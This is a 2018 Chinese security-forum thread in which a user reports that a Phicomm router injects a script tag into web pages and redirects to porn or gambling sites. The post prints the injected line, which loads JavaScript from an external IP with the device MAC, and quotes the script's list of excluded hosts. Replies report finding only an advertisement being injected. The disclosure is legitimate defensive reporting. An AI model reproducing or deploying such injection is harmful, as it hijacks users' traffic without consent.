恶意网站 url跳转
某品牌路由http劫持插入js并跳转到黄色/bc网站
rsj123 2018-07-27 21:31:07 2765人浏览

本人使用的斐讯家的路由

今天看网站总是莫明奇妙跳转一些奇怪的网站,看了看html

在head被插入这样一句

<script src=http://222.73.156.235:8888/v2?MAC=×××××××××××></script>

(mac已经隐去)

反查域名

http://ad.phicomm.com/

可以,没跑了

查看js内容发现这个数组

        var forbidHostArray = [".qq.com", "www.xinhuanet.com", ".eastday.com", "china.com.cn", "www.chinadaily.com.cn", ".caijing.com.cn", ".huanqiu.com", ".youku.com", ".youth.cn", ".people.com.cn", "www.wangxin.name", "wjwcoin.pro", "www.wkj.link", "www.bid-buy.pro", "www.daywin.pro", "www.7650.biz"];

各位懂得

ip地址(1) 威胁情报数目 开放端口 所属域名 相关样本 微步标签 < 1/1 >
gao_X 2018-08-26 15:31:38 回复
这东西光看标题就是fx
rsj123 2018-08-02 10:27:06 回复
这两天大多是自家体脂称广告,至于别的原因我倒是想不出来。多个不同网站都有跳转,新装的linux,应该可以排除恶意软件。dns是微步在线的onedns。
wingssyi 2018-08-01 23:57:08 回复
看了js,换了几个mac参数请求,都只插了一条自家的体脂秤广告,楼主跳黄网难道说是别的原因?:p
wingssyi 2018-08-01 23:43:58 回复
链接里mac还是有的
匿名用户 2018-07-31 19:08:26 回复
我擦的 太无孔不入了吧
未知数 2018-07-30 17:24:58 回复
顶!
匿名用户 2018-07-30 10:47:30 回复
牛逼啊.....
yesterday 2018-07-29 23:20:49 回复
这!
namex 2018-07-29 13:31:45 回复
太不要脸了,我擦。
奖励计划banner
今日推荐